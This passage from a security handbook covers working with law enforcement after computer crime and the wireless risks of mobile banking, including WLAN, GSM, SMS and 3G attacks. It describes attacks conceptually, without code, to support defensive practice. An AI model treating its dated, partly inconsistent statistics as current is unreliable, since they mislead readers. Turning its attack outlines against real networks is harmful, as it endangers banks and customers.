There are many potential problems in dealing with law enforcement agencies, not the least of which is their experience with computers, networking, and criminal-related investigations. Computer-illiterate agents may sometimes seek your assistance to try to understand the subtleties of the case. Other times, they may ignore your advice--perhaps to hide their own ignorance, and often to the detriment of the case and the reputation of the law enforcement community. Note that there is always the possibility that the "victim" in a crime is also involved in criminal activity. In general, it is poor practice for an investigator to accept advice from the victim without some level of suspicion, and this is no different in the case of cybercrime.

If you or your personnel are asked to assist in the execution of a search warrant to help identify material to be searched, be sure that the court order directs such "expert" involvement. Otherwise, you might find yourself complicating the case by appearing to be an overzealous victim. You may benefit by recommending an impartial third party to assist the law enforcement agents.

The attitude and behavior of the law enforcement officers can sometimes cause major problems. Your equipment might be seized as evidence or held for an unreasonable length of time for examination--even if you are the victim of the crime. If you are the victim and are reporting the case, the authorities will usually make every attempt to coordinate their examinations with you, to cause you the least amount of inconvenience. However, if the perpetrators are your own employees, or if regulated information is involved (bank, military, etc.), you might have no control over the manner or duration of the examination of your systems and media. This problem becomes more severe if you are dealing with agents who need to seek expertise outside their local offices to examine the material. Be sure to keep track of downtime during an investigation, as it may be included as part of the damages during prosecution and any subsequent civil suit--suits that may be waged against either your attacker or, in some cases, against the law enforcement agency itself.

Your site's backups can be extremely valuable in an investigation. You might even make use of your disaster-recovery plan and use a standby or spare site while your regular system is being examined.

Heavy-handed or inept investigative efforts may also place you in an uncomfortable position with respect to the computer community. Many computer users harbor negative attitudes toward law enforcement officers--and these feelings can easily be redirected toward you if you are responsible for bringing the "outsiders" in. Such attitudes can place you in a worse light than you deserve, and hinder cooperation not only with the current investigation but with other professional activities. Furthermore, they may make you a target for electronic attack or other forms of abuse after the investigation concludes.

These attitudes are unfortunate, because there are some very good investigators, and careful investigation and prosecution may be needed to stop malicious or persistent intruders. We can report that this situation seems to have gotten better in recent years, so this is less of a concern than it was a decade ago. As time goes on, and as more people realize the damage done by intruders, even those without malicious intent, we expect to see the antipathy towards law enforcement fade even more.

We do encourage you to carefully consider the decision to involve law enforcement agencies with any security problem pertaining to your system. In most cases, we suggest that you carefully consider whether you want to involve the criminal justice system at all unless a real loss has occurred, or unless you are unable to control the situation on your own. In some instances, the publicity involved in a case may be more harmful than the loss you have sustained.

Once you decide to involve law enforcement, avoid publicizing this fact. In some cases the involvement of law enforcement will act as a deterrent to the attackers, but in other cases it may make you the subject of more attacks. Also be aware that the problem you spot may be part of a much larger problem that is ongoing or beginning to develop. You may be risking further damage to your systems and the systems of others if you decide to ignore the situation.

We wish to stress the positive. Law enforcement agencies are generally aware of the need to improve how they investigate computer crime cases, and they are working to develop in-service training, forensic analysis facilities, and other tools to help them conduct effective investigations. In many jurisdictions (especially in high-tech areas of the country), investigators and prosecutors have gained considerable experience and have worked to convey that information to their peers. The result is a significant improvement in law enforcement effectiveness over the last few years, with many successful investigations and prosecutions. You should very definitely think about the positive aspects of reporting a computer crime--not only for yourself, but for the community as a whole. Successful prosecutions may help prevent further misuse of your system and of others' systems.

The Responsibility to Report Crime

Finally, keep in mind that criminal investigation and prosecution can only occur if you report the crime. If you fail to report the crime, there is no chance of apprehension. Not only does that not help your situation, it leaves the perpetrators free to harm someone else. Remember that the little you see may only be one part of a huge set of computer crimes and acts of vandalism. Without investigation, it isn't possible to tell if what you have experienced is an isolated incident or part of a bigger whole.

A subtler problem results from a failure to report serious computer crimes: it leads others to believe that there are few such crimes being committed. As a result, insufficient emphasis is placed on budgets and training for new law enforcement agents in this area; little effort is made to enhance the existing laws; and little public attention is focused on the problem. The consequence is that the computing milieu becomes incrementally more dangerous for all of us.

Criminal Hazards for Businesses

If you operate an Internet service provider or web site, or have networked computers on your premises, you may be at risk for criminal prosecution yourself if those machines are misused. This section is designed to acquaint you with some of the risks.

If law enforcement officials believe that your computer system has been used by an employee to break into other computer systems, to transmit or store controlled information (trade secrets, child pornography, etc.), or to otherwise participate in some computer crime, you may find your computers impounded by a search warrant or writ of seizure. If you can document that your employee has had limited access to your systems, and if you present that information during the search, it may help limit the scope of the confiscation. However, you may still be in a position in which some of your equipment is confiscated as part of a legal search.

Depending on accepted practices in your legal system, local police or federal authorities may present a judge with a petition to grant a search warrant if they believe there is evidence to be found concerning a violation of a law. If the petition is in order, the judge may grant the search warrant. In the recent past, a few federal investigators and law enforcement personnel in some states developed a reputation for heavy-handed and excessively broad searches. In part, this was because of inexperience with computer crime, and it has been getting better with time.

Playing It Safe . . .

Here is a summary of additional recommendations for avoiding possible abuse of your computer. Most of these are simply good policy whether or not you anticipate break-ins:

· Put copyright and/or proprietary ownership notices in your source code and data files. Do so at the top of each and every file. If you express a copyright, consider filing for the registered copyright--this version can enhance your chances of prosecution and recovery of damages.
· Be certain that your users are notified about what they can and cannot do.
· If it is consistent with your policy, make all users of your system aware of what you may monitor. This includes e-mail, keystrokes, and files. Without such notice, monitoring an intruder or a user overstepping bounds could itself be a violation of wiretap or privacy laws!
· Keep good backups in a safe location. If comparisons against backups are necessary as evidence, you need to be able to testify as to who had access to the media involved. Having tapes in a public area will probably prevent them from being used as evidence.
· If something happens that you view as suspicious or that may lead to involvement of law enforcement personnel, start a diary. Note your observations and actions, and note the times. Run paper copies of log files or traces and include those in your diary. A written record of events such as these may prove valuable during the investigation and prosecution. Note the time and context of each and every contact with law enforcement agents as well.
· Try to define in writing the authorization of each employee and user of your system. Include in the description the items to which each person has legitimate access (and the items each person cannot access). Have a mechanism in place so each person is apprised of this description and can understand his or her limits.
· Tell your employees explicitly that they must return all materials, including manuals and source code, when requested or when their employment terminates.
· If something has happened that you believe requires law enforcement investigation, do not allow your personnel to conduct their own investigation. Doing too much on your own may prevent some evidence from being used or may otherwise cloud the investigation. You may also aggravate law enforcement personnel with what they might perceive to be interference in their investigation.
· Make your employees sign an employment agreement that delineates their responsibilities with respect to sensitive information, machine usage, electronic mail use, and any other aspect of computer operation that might later arise. Make sure the policy is explicit and fair, and that all employees are aware of it and have signed the agreement. State clearly that all access and privileges terminate when employment does, and that subsequent access without permission will be prosecuted.
· Be prepared with a network and/or keystroke monitoring system that can monitor and record all information that is sent or received by your computer. If you suspect a break-in, start monitoring and recording immediately; do not wait to be given instructions by law enforcement. In some cases law enforcement agencies cannot give you such instructions without first obtaining a court order, since, by acting upon their instructions, you would be acting as an extension of the law.
· Make contingency plans with your lawyer and insurance company for actions to be taken in the event of a break-in or other crime, the related investigation, and any subsequent events.
· Identify, ahead of time, law enforcement personnel who are qualified to investigate problems that you may have. Introduce yourself and your concerns to them in advance of a problem. Having at least a nodding acquaintance will help if you later encounter a problem that requires you to call upon law enforcement for help.
· Consider joining societies or organizations that stress ongoing security awareness and training, and work to enhance your expertise in these areas.

[63] A more extensive, although dated, discussion of legal issues in the United States can be found in Computer Crime: A Crimefighter's Handbook (O'Reilly), and we suggest you start there if you need more explanation than we provide in this chapter. The book is out of print, but used copies are available.
[64] Although few computer intruders are as clever as they believe themselves to be.

CHAPTER 10. MOBILE RISK MANAGEMENT: E-FINANCE IN THE WIRELESS ENVIRONMENT[65]

At a Glance

This chapter documents the risks to electronic security (identity theft, hacking, etc.) that wireless technologies may present in the context of the delivery of financial services. Although the extent of security measures to be taken is not independent of the size of the transactions contemplated, this chapter points out a variety of ways that interactions between technologies create points of vulnerability for the security of financial transactions when wireless technology is employed. This chapter lays out a variety of critical actions and measures that system administrators (particularly in banks) can take in order to mitigate these risks to the largest possible extent, and often without great increases in the costs of security. The actions suggested in this chapter for mitigating such risks reflect a concerted effort to address what many in the electronic security industry consider to be best practice in regard to electronic security arrangements when wireless technologies are used in the delivery of financial services.

Wireless Technology in Emerging Markets

The rapid growth of wireless technology in many emerging markets, and the increasing use of such technologies in coordination with the Internet or on a free-standing basis to provide financial services in emerging markets, will demand a very careful look at issues related to electronic security. Nowhere is this issue more prevalent in emerging markets than in the area of wireless technology, given the extensive spread of cellular technology to many emerging markets. As more and more countries attempt to leapfrog via use of such technologies in the context of providing financial services, it is essential to recognize the potential electronic security breaches that can occur via use of wireless technologies, and how market participants and systems administrators at banks or other key providers (e.g., hosting companies or ISPs) can better ensure that problems do not arise. Hence, this chapter attempts both to illustrate how and why electronic security can become a concern and to show how to mitigate this risk via many actions that may not entail substantial additional costs for providers of financial services.

Many of the actions recommended in this chapter, relating to layered security for wireless applications that provide financial services, represent what can be considered best practice in the electronic security industry today. This comes with the important proviso that the rapid changes in technology make this a very difficult area in which to prescribe static guidelines for system administrators within financial service providers.

The chapter is divided into the following sections. Section I introduces the reader to the widespread usage of e-finance and wireless technologies throughout the world. Section II illustrates the risks that are inherent to the wireless revolution. Section III depicts the vulnerabilities associated with WLANs and the appropriate risk-mitigating procedures necessary to secure them. Section IV addresses the evolution of GSM networks and the vulnerabilities that are inherent to them. Section V details the appropriate methods of managing the risk found in GSM networks. Section VI illustrates the best practices for management of risk in the delivery of payment services. Section VII offers a conclusion with a perspective into the future (3G).

The purpose of this document is to enunciate a set of security and risk management guidelines for banks and payment services. It aims to provide a framework for security risk assessment applicable to the wireless environment.

I. Overview of e-finance[66]

Electronic financial services, whether delivered online or through remote mechanisms, have spread rapidly. Countries and consumers are increasingly getting connected. These new technologies not only allow countries to leapfrog in connectivity, they also open new channels for delivering e-financial services.[67] Since the mid-90s, investment in banking technology has focused upon online[68] banking and brokerage services to increase convenience. E-finance has lowered the costs of providing financial services. The Internet eliminates many processing steps and labor costs, while avoiding the fixed costs of branch development and maintenance. A typical customer transaction through a branch or phone call costs about $1 in the U.S., but that transaction costs just $0.02 online. The lower costs for providing financial services have also allowed greater access to financial services. Internet-based services are sometimes as popular in emerging markets as in industrialized ones. For example, online banking is nearly as widespread in Brazil as in the United States. Due to the apparent lack of fixed-line infrastructure in many developing nations, most financial institutions have implemented wireless e-financial platforms to expand access to their services. Concurrent with these realities, four new technology-related industry trends have occurred: outsourcing, open architecture, integrated strategies, and new methods of e-payment.[69]

E-finance is comprised of four primary channels. These are: electronic funds transfers, "EFT"; electronic data interchange, "EDI"; electronic benefits transfers, "EBT"; and electronic trade confirmations, "ETC". EFT is the oldest form of electronic money transmittal, beginning in the early 1960s. There is a huge amount of EFT worldwide among and between banks. The U.S. Treasury estimates the figure to be $2 trillion/day or $700 trillion/year. A significant part of banking EFT via the SWIFT network is actually carried out via international satellite. Currently, half of the world's 200 countries obtain Internet and "Wide Area Intranet" connection via satellite links. Although these are typically the nations with the most developed economies, this involves a significant amount of digital traffic and e-finance operations. This is a major concern in terms of vulnerability.[70]

By 2005, the share of online banking could rise from 8.5 percent to 50 percent in industrial countries, and from 1 to 10 percent in emerging markets. Online banking transactions with better connectivity in emerging markets could rise even further, to 20 percent by 2005. There could be more than 6 trillion dollars of business-to-business (B2B) transactions online by 2005.[71]

Another trend is moving in tandem with this growth in e-finance: the widespread usage of wireless communications technologies in the developing and developed countries of the world. This relatively new medium is quickly becoming the medium of choice for e-commerce and e-finance. The migration of business from paper-based systems of commerce to Internet-based platforms is profound. As services migrate from these "land lines" to more accessible wireless technologies, the subsequent negative externalities (e.g., war driving) of this phenomenon are beginning to proliferate as well.

Mobile devices are considered to be the developing world's technological springboard. In 1990, there were just 11 million[72] mobile phone subscribers worldwide. By 1999, the proliferation of wireless technologies had exploded to over 500 million. Now that number has almost doubled. One developing country typifies the possibilities of leapfrogging[73] using mobile devices. With a fixed-line network obliterated after more than 20 years of civil war, Cambodia became connected via the widespread adoption of wireless technology. Within one year, mobile subscribers outnumbered fixed telephones. Cambodia, with one of the world's lowest per capita incomes, surpasses 31 countries in overall telephone penetration, including countries with much higher incomes. Rather than spending the vast amount of resources and time needed to establish fixed-line infrastructure to facilitate telecommunications, countries around the world are substituting relatively cheap and easy-to-develop cellular towers for hard-wired infrastructure. There are, however, certain security risks associated with such leapfrogging.

Continued economic integration and the new delivery channels for financial services, such as the wireless protocols, will increase opportunities for banks to deliver financial services to remote areas. However, these opportunities are not limited to the formal economy. The underground (criminal) economy of the world has adopted technology as well. Integration of financial services across the wireless medium has created an opportunity for identity theft, fund transfer, and extortion.

II. E-finance on Wireless Networks: The Danger

With the benefits of new technology also come risks. Technology facilitates new methods of fraud and theft. Impersonation, remote access, high-quality graphics and printing, and new multipurpose tools and platforms create this cornucopia of crime online. With the spread of dial-up ATMs that provide customer access to money in underdeveloped locations, criminals can manipulate the wireless connection between the dial-up ATM and the parent bank, thus compromising all transactions that move in and out of the dial-up ATM. The art of online penetration (e.g., hacking) was once a very skilled and sophisticated trade. The information age has cultivated a breeding ground for underground hacker websites that now supply dubious individuals with the multi-faceted tools necessary to break into financial platforms. Websites like www.astalavista.box.sk and www.attrition.org supply complex malicious code and viruses that allow novice users to penetrate banking systems. The Internet Data Corporation (IDC) recently reported that over 57 percent[74] of all hack attacks last year were targeted at the financial sector.

The traditional risks of yesteryear have been reshaped. Historically, frauds were paper based or people based. In the electronic environment there are new opportunities for e-financial crime. In 2001, more than one fourth (27 percent) of banking and financial databases were breached.[75] Eastern European organized hacker rings have penetrated hundreds of banks worldwide. Hacking has become a business model for organized crime. The FBI's computer crimes division notes that presently many banks are paying off extortion demands for fear of reputation risk and the potential loss of their customer base to competitors. The Egghead hacking incident of last year is a prime example of extortion. Hackers penetrated a database containing 10,000 credit card numbers and then demanded that the company pay them a large sum of cash in order to protect those numbers from being posted in a chat room. In reality, on Christmas Eve, every one of those compromised cards was charged a minimal sum. Thus the threat goes beyond financial and reputational loss. One forecast suggests that reported incidents of identity theft in the United States will more than triple, from $700,000[76] last year to $1.7 million in 2005, and the costs to financial institutions will increase 30 percent each year, to more than $8 billion in 2005.[77]

Trends in cyber-crime reveal significant growth. Attacks on servers doubled in 2001 compared to 2000, and nearly 90 percent of companies surveyed have been infected with worms or viruses despite having anti-virus software installed, according to the Information Security Industry Survey.[78] The 2001 CSI/FBI Computer Crime and Security Survey stated that over $377 million in total annual losses occurred due to hacking in the United States last year.[79]

The issue of non-reporting is at the heart of why this serious issue has not been dealt with appropriately

[65] See the World Bank paper by Tom Kellermann, "Mobile Risk Management: e-Finance for the Wireless Environment" (2002), via link at: http://wbln0018.worldbank.org/html/FinancialSectorWeb.nsf/SearchGeneral?openform&E-Security/E-Finance&Publications
[66] For more detailed analysis of the e-security dilemma, refer to "E-security Risk Mitigation for Financial Transactions," authored by Glaessner T., T. Kellermann, and V. McNevin, 2002.
[67] Glaessner, T., S. Claessens, and D. Klingebiel. 2001. "E-finance in Emerging Markets: Is Leapfrogging Possible?"
[68] Goldman Sachs and Boston Consulting Group Statistics, 2000.
[69] Gilbride, Edward. Emerging Bank Technology and the Implications for E-crime Presentation. September 3, 2001.
[70] Dr. Joseph N. Pelton, "Satellite Communications 2001: The Transition to Mass-Consumer Markets, Technologies, and Systems".
[71] Jupiter Communications, 2001.
[72] Box 1 of "E-Finance in Emerging Markets: Is Leapfrogging Possible?" Claessens, S., T. Glaessner, D. Klingebiel, 2001.
[73] Leapfrogging is defined as the phenomenon when developing countries build a hi-tech wireless communications infrastructure rather than undertaking the massive project of creating a fixed-line infrastructure within their borders.
[74] www.idc.com.
[75] Evans Data Corp. Survey.
[76] This figure represents a yearly trend within the United States of America only.
[77] Published in a 2001 report by Celent Communications. The projections were made using FTC data.
[78] http://www.infosecuritymag.com/articles/october01/images/survey.pdf.
[79] James Savage, Special Agent in Charge, Secret Service, Financial Crimes division, stated that: "This figure represents critical infrastructure losses that the business community is willing to admit having suffered." He suggested that this figure may represent only a minuscule fraction of the actual damage incurred to the U.S.
Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 133

Financial entities and corporations are fearful of reporting their losses due to the public image ramifications and thus remain complacent to the presence of the threat. If it becomes known that a financial provider has fallen victim to a computer crime or fraud, there is the assumption that their customers will lose confidence in them and their ability to protect information. It is essential for financial service providers to maintain control of their systems and mitigate compromises to their security. The wireless medium, which is proliferating worldwide, is not a secure medium. The haste with which countries have adopted wireless platforms for the purposes of e-finance has created a significant quandary.

III. Wireless Local Area Networks (WLANs)

Wireless networks are currently available in three basic formats: wireless LANs (WLANs) using the 802.11b protocol; CDMA/TDMA/GSM (cellular and PCS) networks used for wireless phones and personal digital assistants (PDAs); and high-powered microwave systems used by telephone companies for long-haul, line-of-sight communications. While all of these are common throughout the world, they all suffer from the same basic security flaw: they use radio frequency (RF) technology to transmit their information. This can result in their transmissions being compromised.

Wireless networks (WLANs) have seen explosive growth in their deployment. With cost savings at an all-time high and with the simplicity of installation, WLANs have been deployed rapidly, especially by financial institutions. Wireless networks were supposed to do what traditional Ethernet LANs do, without cables. Convenience for the customer is paramount in the proliferation of wireless. Currently wireless technology is built around the 802.11b IEEE standard in the United States and the GSM standard in Europe. When designing a wireless network, there are important security concerns one should keep in mind.

There are seven basic categories of wireless network security risks:⁸¹

1. Insertion Attacks – The intruder attempts to insert traffic into your network, typically through an unsecured mobile access point.
2. Session Hijacking – Also known as the man-in-the-middle attack, it is possible to hijack a wireless session based upon the reality that the phone authenticates itself to the base station but not vice versa. It is possible to emulate the base station and thus hijack a phone's session.
3. Jamming – This is a DoS (Denial of Service) attack where the attacker tries to flood the radio frequency (RF) spectrum of your wireless network by broadcasting packets at the same frequency as your network.
4. Encryption Attacks – The IEEE 802.11b wireless network standard uses the WEP (Wired Equivalent Privacy) encryption method. This standard uses weak encryption and Initialization Vectors (IVs) and has been cracked successfully many times.
5. Traffic Interception and Monitoring (War Driving) – Wireless packets using the 802.11b standard have an approximate transmission distance of 300 feet. This means that anyone with the proper standard equipment can receive that signal if they are in transmission range. Equipment to further extend that range is easily available, so the area of interception can be quite large and hard to secure properly.
6. Mobile Node to Mobile Node – Most mobile nodes (laptops, PDAs) are able to communicate directly with each other if file sharing or other TCP/IP services are running. This means that any mobile node can transfer a malicious file or program rapidly throughout your network.
7. Configuration Issues – Any wireless device, service, or application that is not correctly configured before installation and use can leave an entire network at risk. Most wireless devices and applications are pre-configured to accept any request for services or access. This means any passing mobile client can request and receive telnet or ftp sessions.
8. Brute Force Attacks – Most wireless access points use a shared password or key for all devices on that network. This makes wireless access points vulnerable to brute force dictionary attacks against passwords.

80. Cornelius Tate, Special Agent, CERT, depicted the lack of reporting: "I think the dollar loss is actually higher than what is being reported. In my experience, I see companies not reporting or downplaying their compromises or losses. I think a lot of the reduced reporting comes down to the company attempting to reduce the 'shock' to the stockholders and the public. I think you will see a noticeable increase in the dollar amount from year to year (although the number of respondents remains consistent) because companies are more aware of the fact that everyone is susceptible to being a victim, and to be a victim has become acceptable and does not equate to a loss of 'public confidence.'" (October 4, 2001).
81. Chris Bateman of CERT Analysis Center contributed the seven wireless vulnerabilities.

War driving

Industrial espionage and white-collar crime have reached new heights with the advance of new technologies. War dialing, the hacking practice of phoning up every extension of a corporate phone network until the number associated with the firm's modem bank is hit upon, has been replaced by war driving. War driving involves motoring around targeted financial institutions and corporate headquarters with a laptop fitted with a WLAN card and trying to record network traffic (sniffing). According to Dave Thomas, the Chief Investigator of the FBI Computer Crimes Division, war driving is a widespread phenomenon that jeopardizes the security of all institutions and corporations that implement WLANs.

When testing and deploying WLANs, a network administrator may find that their laptops can only connect to the access points within a certain distance and therefore assume that the signals don't travel beyond this point. This is a flawed assumption. In fact, these signals may travel for several thousand meters given there is nothing in the way to deflect or interrupt the signal. The reason for this misconception is that the small antennae in the laptops cannot detect the weaker signals. However, using external antennae, the range can be vastly extended. The wireless segment is usually omnidirectional, so a potential adversary need not gain physical access to the segment to sniff (or record) the packet traffic. As a result WLANs are susceptible to message interception, alteration, and jamming.

The above considerations raise the issue of how to better secure wireless networks. This will be as critical as securing fixed-line Internet systems in the emerging markets as highlighted above. Each of these security breaches and associated risks can be minimized or negated with the proper use of security policy and practices, network design, system security applications, and the correct configuration of security controls. The last chapter of Part 3 includes information on how to secure WLANs.

IV. The European Cellular Standard: GSM

GSM is the world's most widely deployed and fastest growing digital cellular standard. Currently, there are nearly 600 million GSM subscribers worldwide, more than two thirds of the world's digital mobile population.⁸² And this figure is increasing by four new users per second. GSM covers every continent, being the technology of choice for 400 operators in over 170 countries. But this is only the beginning of the wireless revolution. The industry predicts that there will be over 1.4 billion GSM customers by the end of 2005. GSM phones have a small smart card inside them, which holds the identity of the cell phone. This small smart card is called the Subscriber Identification Module (SIM). The SIM must keep the identity inside secret and uses cryptography to protect it. The SIM card may be seen as a strength and a weakness of the GSM technology.

GSM Vulnerabilities

The SIM Card Vulnerability

In both European and American GSM systems, the network access method is the same. Removable smart cards in the phone (SIM cards) are used to store phone numbers, account information, and additional software such as wireless web browsers. The data on the cards are encrypted, but the COMP128 algorithm that protects the information on the card has been compromised, thus making these cards susceptible to duplication. War driving is not a substantial issue for cellular subscribers utilizing GSM. Regardless of frequency, cellular signals can easily be jammed. There is a widely known method for recovering the key for an encrypted GSM conversation in less than a second using a PC with 128 MB of RAM and 73 GB of hard drive space.

82. The North American GSM system currently operates at 1900 MHz in conjunction with digital PCS services. The data services associated with GSM are Short Message Service (SMS), Analog Cellular Switched Data (CSD), and General Packet Radio Service (GPRS).⁴⁰ Most European cellular carriers use a form of GSM, in either 900 MHz or 1800 MHz.⁴¹ Europeans also have the option of using High Speed Circuit Switched Data (HSCSD), which combines several channels into a single channel capable of 38.4 kbps. GPRS is also available in most countries.

The security of GSM phone technology is questionable. It is possible to clone GSM SIM cards.
The hack attack is possible because critical algorithms are flawed, making it possible to dump the contents of the SIM cards and then emulate them using a PC.⁴³ This latest problem could render GSM phone conversations totally insecure. For a bank there are other issues. For example, a remote teller machine could be tricked into communicating with a fake mobile tower because it cannot reach a real one. This would allow the perpetrator to remotely control the transmissions of funds via the teller machine.

The SMS Vulnerability⁴⁵

GSM offers Short Message Services (SMS). SMS is used in GSM systems for many reasons, such as voice-mail notification, updating the subscriber's SIM, sending short text messages, and communicating with e-mail gateways. Whereas these services are convenient, they pose an additional risk to the security of the network. SMS is a store-and-forward service that is inherently insecure because the messages are transmitted in clear text and subsequently stored in clear text at the SMS center before being forwarded to their intended recipients. SMS also suffers from latency problems. Time-critical transactions should not rely on this channel. There is freely available software that can spoof SMS messages, send SMS bombs both to handsets and SMS gateways (used to communicate between devices both on and off the network), and corrupt SMS packets so that they crash the software on most handsets.

SIM Toolkit technology (STK) can be used to provide encryption security through the SMS channel. However, this is a transport layer security mechanism, and it does not provide end-to-end confidentiality for the customer PIN. Additional procedures for improving SMS security might include customers checking their personal assurance messages and the service provider, in turn, verifying the registered phone numbers of customers.

The GPRS Vulnerability

General Packet Radio Service (GPRS) is an IP packet-based service that allows an always-on connection to the Internet. The main problem with this is that it still relies on SMS for WAP push requests. A spoofed (cloned) SMS packet can be sent to the phone requesting a redirected site and fooling users into entering their information into what they believe is a secure order form, but is really a fake site. Many GPRS-enabled phones also support Bluetooth. Each Bluetooth device has a unique address, allowing users to have some trust in the person at the other end of the transmission. Once this ID is associated with a person, by tracking the unscrambled address sent with each message, individuals can be traced and their activities easily logged. For Bluetooth devices to communicate, an initialization process uses a PIN for authentication. While some devices will allow you to punch in an ID number, you can also store a PIN in the device's memory or on a hard disk. This is highly problematic if the physical security of the device cannot be guaranteed. Also, most PINs use four digits, and half the time they are "0000."

The security of Bluetooth is based on keeping the encryption key a secret shared only between participants in the network. But imagine you and I are having a conversation using our Bluetooth cell phones. To keep the conversation secure, I use your secret key to encrypt the information. Later that day, a friend calls you again and you use your key. Knowing your key, I can use a faked device address, determine the encryption, and listen to your phone conversations. I could also masquerade as you or your friend. Bluetooth only authenticates devices, not users.

WAP Weaknesses

The common flaw in any of these devices, no matter what network, is the Wireless Application Protocol standard, which also includes Wireless Markup Language (WML) and Handheld Device Markup Language (HDML). For the sake of convenience, developers try to require the least number of keystrokes when entering credit card, personal, or account information. This means that most of this information is still stored on a server, but the password to access that server is stored in a cookie on the handheld device, requiring only a PIN or sometimes nothing at all to shop online or transfer funds. This leaves the actual mechanism used to transport sensitive information end to end in these untrusted public cellular networks, which is left to Wireless Transport Layer Security (WTLS).

Unless 128-bit SSL for mobile commerce or IPSEC for enterprise access is being used (which most handsets can't support due to lack of processing power and bandwidth), there will be a weak link somewhere in the network that can be exploited. Even then, this only pushes the weakness out to the end devices that are communicating, and can be easily lost. GSM uses the Wireless Application Protocol (WAP) and also the Wireless Transport Layer Security (WTLS). This is equivalent to Secure Socket Layer (SSL) but has weaker encryption algorithms. WTLS is not compatible with SSL, which is the industry standard. Wireless messages travel through a "gateway" which channels them to a wired network for retransmission to their ultimate destination. At the gateway the WTLS message is converted to SSL. For a few seconds, the message is unencrypted inside the gateway, which in turn makes the communication vulnerable to interception.

V. Security Solutions for GSM

The inherent problems affecting GSM are not easily corrected. The telephones and PDAs that utilize GSM technology typically cannot upload protective firmware and software. Users are at the mercy of the telephone developer. Whereas GSM is not vulnerable to war driving like its American counterpart, 802.11, it is suffering from four core vulnerabilities. The 802.11 standard is geared towards computers, not hand-helds, and thus security can be improved much more drastically for 802.11 than for the GSM protocol. Virtual Private Networks are the common thread between the two. The establishment of VPNs is commonly referred to as the solution for the existing vulnerabilities of GSM and 802.11. However, when it comes to proper layered security there are no magic bullets. Further information on securing wireless networks may be found at the end of Part 3 and in Part 5: Security for Technical Administrators.

VI. Banking Security Practices⁸³

As a result of the widespread usage of GSM for the delivery of e-financial services, there are certain control and security standards that financial providers should adhere to when providing wireless access to payment systems.

Payments through Third Parties

As a general rule, banks should directly authenticate their own customers in respect of the wireless payment transactions made. Customers may, however, give their banks specific standing authorizations to accept payment debits from specified providers or third parties to charge the customers' accounts. Such arrangements could, for example, be made through Direct Debit Authorization agreements. However, when operating under these arrangements, third parties should neither obtain nor store the customers' personal banking IDs or PINs for the purpose of raising debit transactions against the customers' bank accounts.

Stored Value Accounts (SVA)

SVAs are utilized by customers who transfer funds into these accounts for the purpose of making periodic payments. SVAs may reside in mobile devices. No bank account should be accessed in making a payment. Bank accounts should be used only for replenishing SVAs at the customer's direction.

Close Proximity Wireless Payments

Close proximity wireless payment services are typically intended for over-the-counter retail payments. Such transactions should be completed only after customers have given explicit authorizations at points of sale. In the absence of such authorizations, it is possible that customers' funds may be involuntarily deducted from their SVA. Thus, explicit authorization should be mandatory for any payment request.

Interactive Voice Response (IVR)

Mobile IVR services are vulnerable to eavesdropping through the interception of calls. IVR systems should not be used for high-risk and/or high-value services. All IVR sessions should be recorded, including the caller's phone number and the sequence of transactions made by a customer. PIN or authentication data should not be logged.

83. Section provided by Tony Chew, Director, Technology and Risk Supervision of the Monetary Authority of Singapore.

Customer Education

Banks should educate the consumer of mobile e-financial services in the following ways:

· Customers should be advised to use different PINs for different online services.
· Instructions should be provided to customers on how to configure their mobile devices to access mobile banking and payment applications in a safe manner.
· Customers should be advised as to the appropriate dispute handling, reporting procedures, and the expected time for resolution of complaints.
A View into the Future: 3G Technology

3G signifies the third generation of wireless communication technology. It refers to pending improvements in wireless data and voice communications through any of a variety of proposed standards. The immediate goal is to raise transmission speeds from 9.5K to 2M bit/sec. In systems and communications security the goal is not to design a flawless system, but a system that can adapt to security enhancements as the need for them is identified. Several of the attacks that were possible on 2G and 2.5G networks have been addressed and eliminated in the 3G environment.

The Strengths of 3G's Security Structure

3G security was based on GSM security, with the following important changes:

· A change was made to defeat the false base station attack. The security mechanisms include a sequence number that ensures that the mobile can identify the network.
· Key lengths were increased to allow for the possibility of stronger algorithms for encryption and integrity.
· Mechanisms were included to support security within and between networks.
· Security is based within the switch rather than the base station as in GSM. Therefore, links are protected between the base station and switch.
· Integrity mechanisms for the terminal identity (IMEI) have been designed in from the start, rather than being introduced late, as in GSM.
· The authentication algorithm has not been defined, but guidance on choice will be given.
· When roaming between networks, such as between GSM and 3GPP, only the level of protection supported by the smart card will apply. Therefore, a GSM smart card will not be protected against the false base station attack when in a 3GPP network.

The 3G system is far more secure than its GSM counterpart. That being said, the ingenuity of nefarious individuals should never be underestimated. Given this, there are certain attacks that are theoretically possible on a 3G network. They are described below.

Camping on a False Base Station

This attack requires a modified Base Station/Mobile Station (BS/MS) and exploits the weakness that a user can be enticed to camp on a false base station. A false BS/MS can act as a repeater for some time and can relay some requests between the network and the target user, but subsequently modify or ignore certain service requests and/or paging messages related to the target user.

The security architecture does not prevent a false BS/MS relaying messages between the network and the target user, nor does it prevent the false BS/MS ignoring certain service requests and/or paging requests. Integrity protection of critical messages may, however, help to prevent some denial of service attacks which are induced by modifying certain messages. Again, the denial of service in this case only persists for as long as the attacker is active, unlike the above attacks, which persist beyond the moment where intervention by the attacker stops. These attacks are comparable to radio jamming, which is very difficult to counteract effectively in any radio system.

Forcing Unencrypted Communications

This attack requires a modified BS/MS. While the target user camps on the false base station, the intruder pages the target user for an incoming call. The user then initiates the call set-up procedure, which the intruder allows to occur between the serving network and the target user, modifying the signaling elements such that for the serving network it appears as if the target user does not want to enable encryption. After authentication the intruder cuts the connection with the target user, and subsequently uses the connection with the network to make fraudulent calls on the target user's subscription.

Integrity protection of critical signaling messages protects against this attack. More specifically, data authentication and replay inhibition of the connection set-up request allow the serving network to verify that the request is legitimate. In addition, periodic integrity-protected messages during a connection help protect against hijacking of unenciphered connections after the initial connection establishment. However, hijacking the channel between periodic integrity protection messages is still possible, although this may be of limited use to attackers. In general, connections with ciphering disabled will always be vulnerable to some degree of channel hijacking.

Again it should be pointed out that these attack profiles are theoretical in nature, based on an understanding of how the technology will be deployed. All in all, 3G systems have enhanced and improved security technology in place, but continued vigilance is necessary to maintain their security to set-up a mobile originated call.
